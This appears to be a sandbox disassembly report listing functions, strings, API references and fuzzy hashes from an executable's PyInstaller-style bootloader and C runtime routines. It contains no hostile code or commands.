String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$[oV116$calloc$fread$fseek$malloc
API String ID: 677216364-2761527484
Opcode ID: 717e2230fb4e802a6d52b38fb1cf44572713d61057fed9abe336daa52525497c
Instruction ID: af7b0739bf16475b14ff838075313ec0266d431c27592a6456d0ae0be2933662
Opcode Fuzzy Hash: 717e2230fb4e802a6d52b38fb1cf44572713d61057fed9abe336daa52525497c
Instruction Fuzzy Hash: 86719171A2C686C5EB20BB14D4506B9A3A1EB58788F845039ED8D47F9BFE2CE5448F70

Function 00007FF76D5C1440 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 100
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

fread, xrefs: 00007FF76D5C15A1
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF76D5C14A9
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF76D5C14D9
malloc, xrefs: 00007FF76D5C14E0
Failed to extract %s: failed to open archive file!, xrefs: 00007FF76D5C146F
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF76D5C159A
fseek, xrefs: 00007FF76D5C14B0

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: Message
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2030045667-3659356012
Opcode ID: 6dafb8662994b8a1a37633b7f529fd21afb5c9cf46ec6f1b6d61c1ed785f845a
Instruction ID: e1090303b6d967d48e7ca4b378c5d5cbbde2134319f78b6b668c17c49713789e
Opcode Fuzzy Hash: 6dafb8662994b8a1a37633b7f529fd21afb5c9cf46ec6f1b6d61c1ed785f845a
Instruction Fuzzy Hash: 0E415C21B2C653C1EA20BB15A8505BAE3A0EB48B94F945036DE4E47E97FE3CE5418B20

Function 00007FF76D5C11F0 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 154
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to extract %s: failed to allocate temporary input buffer!, xrefs: 00007FF76D5C1295
malloc, xrefs: 00007FF76D5C129C, 00007FF76D5C12CA
Failed to extract %s: failed to allocate temporary output buffer!, xrefs: 00007FF76D5C12C3
1.3.1, xrefs: 00007FF76D5C1229
Failed to extract %s: inflateInit() failed with return code %d!, xrefs: 00007FF76D5C1256
Failed to extract %s: decompression resulted in return code %d!, xrefs: 00007FF76D5C13EE

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: Message
String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
API String ID: 2030045667-2813020118
Opcode ID: 3cb712157a06b071ee6466c04147966b809869f298c755cd6e6bffd2a969e137
Instruction ID: 287f446f9f77c864851de44c49c444a1c6a98fe4868331a5d6f310da19a87954
Opcode Fuzzy Hash: 3cb712157a06b071ee6466c04147966b809869f298c755cd6e6bffd2a969e137
Instruction Fuzzy Hash: EB51B462A2CA42C1EA60BB16A4507BAA291BF45798F844139DD4D47FD7FE3CE541CB30

Function 00007FF76D5C33E0 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 59
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(?,00007FF76D5C3534), ref: 00007FF76D5C3411

Part of subcall function 00007FF76D5C29E0: GetLastError.KERNEL32(?,?,?,00007FF76D5C342E,?,00007FF76D5C3534), ref: 00007FF76D5C2A14
Part of subcall function 00007FF76D5C29E0: FormatMessageW.KERNEL32(?,?,?,00007FF76D5C342E), ref: 00007FF76D5C2A7D
Part of subcall function 00007FF76D5C29E0: MessageBoxW.USER32(?,?,?,00007FF76D5C342E), ref: 00007FF76D5C2ACF

Strings

\\?\, xrefs: 00007FF76D5C3482
Failed to obtain executable path., xrefs: 00007FF76D5C341B
[oV116, xrefs: 00007FF76D5C33EF
Failed to convert executable path to UTF-8., xrefs: 00007FF76D5C34B8
GetModuleFileNameW, xrefs: 00007FF76D5C3422
Failed to resolve full path to executable %ls., xrefs: 00007FF76D5C3461

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: Message$ErrorFileFormatLastModuleName
String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$[oV116$\\?\
API String ID: 517058245-1491725795
Opcode ID: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
Instruction ID: 3e318591bf323d374e0c0ceccb56d2509de617ca72c216a2ffb406021f04854f
Opcode Fuzzy Hash: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
Instruction Fuzzy Hash: A3215161B2C646D1FA21BB24E8553B9A250BF58395FC0013ADE6D86DE7FF2CE5048B30

Function 00007FF76D5DAD6C Relevance: 10.8, APIs: 7, Instructions: 290
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5DB199

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 64dc175ebe5f387d8147aa219be35c50c73af6a678ecd55484cdaf28201a08d1
Instruction ID: aafb22e96dce284fa08566b45f0ed1a251ad769c013d0808e08d1a3ce162d628
Opcode Fuzzy Hash: 64dc175ebe5f387d8147aa219be35c50c73af6a678ecd55484cdaf28201a08d1
Instruction Fuzzy Hash: B5C1E22292C787D1EB61BB5490206BEB761EB94BC0F950131DE6D03B93EE7CE4458338

Function 00007FF76D5D4938 Relevance: 6.1, APIs: 4, Instructions: 90
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5D4965
CreateFileW.KERNEL32 ref: 00007FF76D5D49A4
CloseHandle.KERNEL32 ref: 00007FF76D5D49D9

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: CloseCreateFileHandle_invalid_parameter_noinfo
String ID:
API String ID: 1279662727-0
Opcode ID: ebea2a15e315379b7438f17c06ac6f564ef77e5ce815d722b4931623952d3bd6
Instruction ID: b2ddc5d05920a2b1e720d7c39f6b679bb479ad9be51ccdb2a1caf50ed151d5a5
Opcode Fuzzy Hash: ebea2a15e315379b7438f17c06ac6f564ef77e5ce815d722b4931623952d3bd6
Instruction Fuzzy Hash: 6541A622D2C78283E714AF219520379A251FB98764F509334EEAC03ED6EF7CA1E08724

Function 00007FF76D5CBF5C Relevance: 4.6, APIs: 3, Instructions: 94COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF76D5CC12C: __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF76D5CC140

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF76D5CBF80
__scrt_release_startup_lock.LIBCMT ref: 00007FF76D5CBFEE
__scrt_get_show_window_mode.LIBCMT ref: 00007FF76D5CC041

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
String ID:
API String ID: 3251591375-0
Opcode ID: 51e2e4cc4e0defacebf1dac919e01b91b6d5e84f1fe25dd37a2b49ce45fe95ab
Instruction ID: 1d15394fc232dadb7ac95c06d78cbbb7b2f5d2f9e0a05e88802c2c47313d61a7
Opcode Fuzzy Hash: 51e2e4cc4e0defacebf1dac919e01b91b6d5e84f1fe25dd37a2b49ce45fe95ab
Instruction Fuzzy Hash: 92314821E2C243C5FA24BB6594613B99391AF45385FC45038ED0E5BED3FF6DA805CA35

Function 00007FF76D5CF45C Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5CF4A0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5CF597

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 304c800bfc18b22a295e41f2f803514c44f0a5a87c6028a89610e4dcef950876
Instruction ID: 39cb791920302ef4c6ae9983d04cfcaeaa8e7c8e5090be18153ca7926446163f
Opcode Fuzzy Hash: 304c800bfc18b22a295e41f2f803514c44f0a5a87c6028a89610e4dcef950876
Instruction Fuzzy Hash: 1051C661B2E242C6F628BE25940067AE291BF44BB4F944639DE7D47BD7EE3CD4418E30

Function 00007FFE1024C034 Relevance: 3.1, APIs: 2, Instructions: 60COMMON

Download Yara Rule

APIs

00007FFE1FB1B9F0.CRYPT32 ref: 00007FFE1024C060
00007FFE1FB1B9F0.CRYPT32 ref: 00007FFE1024C093

Memory Dump Source

Source File: 00000003.00000002.2067833752.00007FFE10241000.00000040.00000001.01000000.00000019.sdmp, Offset: 00007FFE10240000, based on PE: true

Associated: 00000003.00000002.2067786315.00007FFE10240000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000003.00000002.2067833752.00007FFE1025E000.00000040.00000001.01000000.00000019.sdmpDownload File
Associated: 00000003.00000002.2067833752.00007FFE10268000.00000040.00000001.01000000.00000019.sdmpDownload File
Associated: 00000003.00000002.2068013590.00007FFE1026B000.00000080.00000001.01000000.00000019.sdmpDownload File
Associated: 00000003.00000002.2068045178.00007FFE1026D000.00000004.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffe10240000_Built.jbxd

Similarity

API ID: 00007
String ID:
API String ID: 3568877910-0
Opcode ID: c5b90022c78a2eeec152cd39a3856e411d0435bc5f328ad14cd6804bf13d6347
Instruction ID: 448d5307b7ab3f22d0b06a6d263bace57a5b3f81864c3befb0be310c60236b29
Opcode Fuzzy Hash: c5b90022c78a2eeec152cd39a3856e411d0435bc5f328ad14cd6804bf13d6347
Instruction Fuzzy Hash: 63214C32B18E55C6EB64DB1BA904729AAA1FB84BA0F589070CF4D83B65DF38E505C600

Function 00007FF76D5DB444 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(?,?,?,?,?,00007FF76D5DB5DD), ref: 00007FF76D5DB490
GetLastError.KERNEL32(?,?,?,?,?,00007FF76D5DB5DD), ref: 00007FF76D5DB49A

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: cd3a9f3ea8ef265e1697b25d2233ff7099ae2ab5e22e5ab4fa41e006c1c379b1
Instruction ID: cb5bd3e4cc8b5e057e8bd0dc03b2afb35d142b7d9d3466d5b2ead6f6e8cfeb58
Opcode Fuzzy Hash: cd3a9f3ea8ef265e1697b25d2233ff7099ae2ab5e22e5ab4fa41e006c1c379b1
Instruction Fuzzy Hash: BD11C461A2CB81C1DB10FB25B554169A362AB48BF4F940331EE7D07BEAEE7CD1508754

Function 00007FF76D5D9E68 Relevance: 2.6, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,00007FF76D5D9CE5,?,?,00000000,00007FF76D5D9D9A), ref: 00007FF76D5D9ED6
GetLastError.KERNEL32(?,?,?,00007FF76D5D9CE5,?,?,00000000,00007FF76D5D9D9A), ref: 00007FF76D5D9EE0

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: CloseErrorHandleLast
String ID:
API String ID: 918212764-0
Opcode ID: 65da2f67be20623dd6870cbeabcb199f1b77c363b63baf0d8a802715797da709
Instruction ID: 8d565cfb5897365f9796d3209cef660bede627e37ac01b6aa85e6b445627a1bf
Opcode Fuzzy Hash: 65da2f67be20623dd6870cbeabcb199f1b77c363b63baf0d8a802715797da709
Instruction Fuzzy Hash: 4021C211F3C64280EA54B761A4B037C92929F847A0F841235DD3E47AD3EE6CA5808739

Function 00007FF76D5D9C58 Relevance: 2.5, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapFree.KERNEL32(?,?,?,00007FF76D5E2032,?,?,?,00007FF76D5E206F,?,?,00000000,00007FF76D5E2535,?,?,?,00007FF76D5E2467), ref: 00007FF76D5D9C6E
GetLastError.KERNEL32(?,?,?,00007FF76D5E2032,?,?,?,00007FF76D5E206F,?,?,00000000,00007FF76D5E2535,?,?,?,00007FF76D5E2467), ref: 00007FF76D5D9C78

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 9fa0b27d1784483699343fce5d0d8fb71a2fef38db5c10c130c8b92919593777
Instruction ID: 745cbc7dc603e88975c203fe418b648da96f7ad396c209a091e6561646013309
Opcode Fuzzy Hash: 9fa0b27d1784483699343fce5d0d8fb71a2fef38db5c10c130c8b92919593777
Instruction Fuzzy Hash: 5FE04F10F2C647C2FB187BB1646517992915F9C782B804030CD1D42A63FE2C68854634

Function 00007FF76D5DB1BC Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5DB1E4

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: aa739a885bc1dd54b6575df94a709b393c0322d321e92581108345db9e2bb901
Instruction ID: f1c944ae47175a2a0f962628a90659ba0569bec227d3d93f9a77630d06030a33
Opcode Fuzzy Hash: aa739a885bc1dd54b6575df94a709b393c0322d321e92581108345db9e2bb901
Instruction Fuzzy Hash: 4F41E63292C201C7EB24BF15A56127DB3A1EB56B80F540131DEAE43A96EF3DE402C775

Function 00007FF76D5C76A0 Relevance: 1.6, APIs: 1, Instructions: 85COMMON

Download Yara Rule

APIs

_fread_nolock.LIBCMT ref: 00007FF76D5C774A

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: _fread_nolock
String ID:
API String ID: 840049012-0
Opcode ID: 3f33f4ea907401e71e1cd8312c1a8899cf969a241791d9adefff38a5321dfa8e
Instruction ID: d5ef1775c7c8e26880a6c61200d845f6e558b49e5e7d89331b1a3fb069e53926
Opcode Fuzzy Hash: 3f33f4ea907401e71e1cd8312c1a8899cf969a241791d9adefff38a5321dfa8e
Instruction Fuzzy Hash: D3219121F2D65685FA10BA16A9043BAE691BF49BD4FC85434DD1D07F83EEBDE041CA30

Function 00007FF76D5DAC4C Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5DACD2

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 49c1b702f419c8ad0ef71248902cf9a0cc608428026b1214a1a74e14a7199740
Instruction ID: bcafe4651ad1ef7a36ab0a2c0a6fafa4312909ee39c45119d71527b8008a285c
Opcode Fuzzy Hash: 49c1b702f419c8ad0ef71248902cf9a0cc608428026b1214a1a74e14a7199740
Instruction Fuzzy Hash: 8431A421E2C645C2F7117B15846177EA650AB64BA1F910135ED3D13BE3EFBCE4818739

Function 00007FF76D5D52A4 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5D5209

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: c73ce0dbb369862aa70d4e112b5ce78fdf9595fecbc559d5a15d5b25d9b89295
Instruction ID: 0fda83ee3f10ff6cd6216f0a38b5fca5da58ddacb1e294859f870b8c1bbb622d
Opcode Fuzzy Hash: c73ce0dbb369862aa70d4e112b5ce78fdf9595fecbc559d5a15d5b25d9b89295
Instruction Fuzzy Hash: 4C118421A2D682C1EA61BF55942017EE264FF56B80FC44431EEAC57E9BEF3CD4408778

Function 00007FF76D5E5664 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5E5687

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: eb818cef5f83307f6059fb404af21ab2d8804f19963bc1c1518551d96bb4d1ba
Instruction ID: eef46f1205c2529964929e8f807375d1985ad6d3f4f67a09118ebfc87a25112a
Opcode Fuzzy Hash: eb818cef5f83307f6059fb404af21ab2d8804f19963bc1c1518551d96bb4d1ba
Instruction Fuzzy Hash: 1821A732A2C681C7DB61AF28D450379B7A0EB98B94F944234DE6D47ADAEF3CD440CB10

Function 00007FF76D5CF6DC Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5CF730

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 1d48df8ff45913ef4d2fe20e3a196162e4d6dc571d0fb1b63797b01b1d6529e7
Instruction ID: c75a6dcb5963d74dfd2af19718cdedb5d1ea1223bc91fda18a02d6881dabb32b
Opcode Fuzzy Hash: 1d48df8ff45913ef4d2fe20e3a196162e4d6dc571d0fb1b63797b01b1d6529e7
Instruction Fuzzy Hash: 9201A521B2C74281E904BB565900079E6D5AB55FE0F884635DE6C13FD7EE3CE4028B20

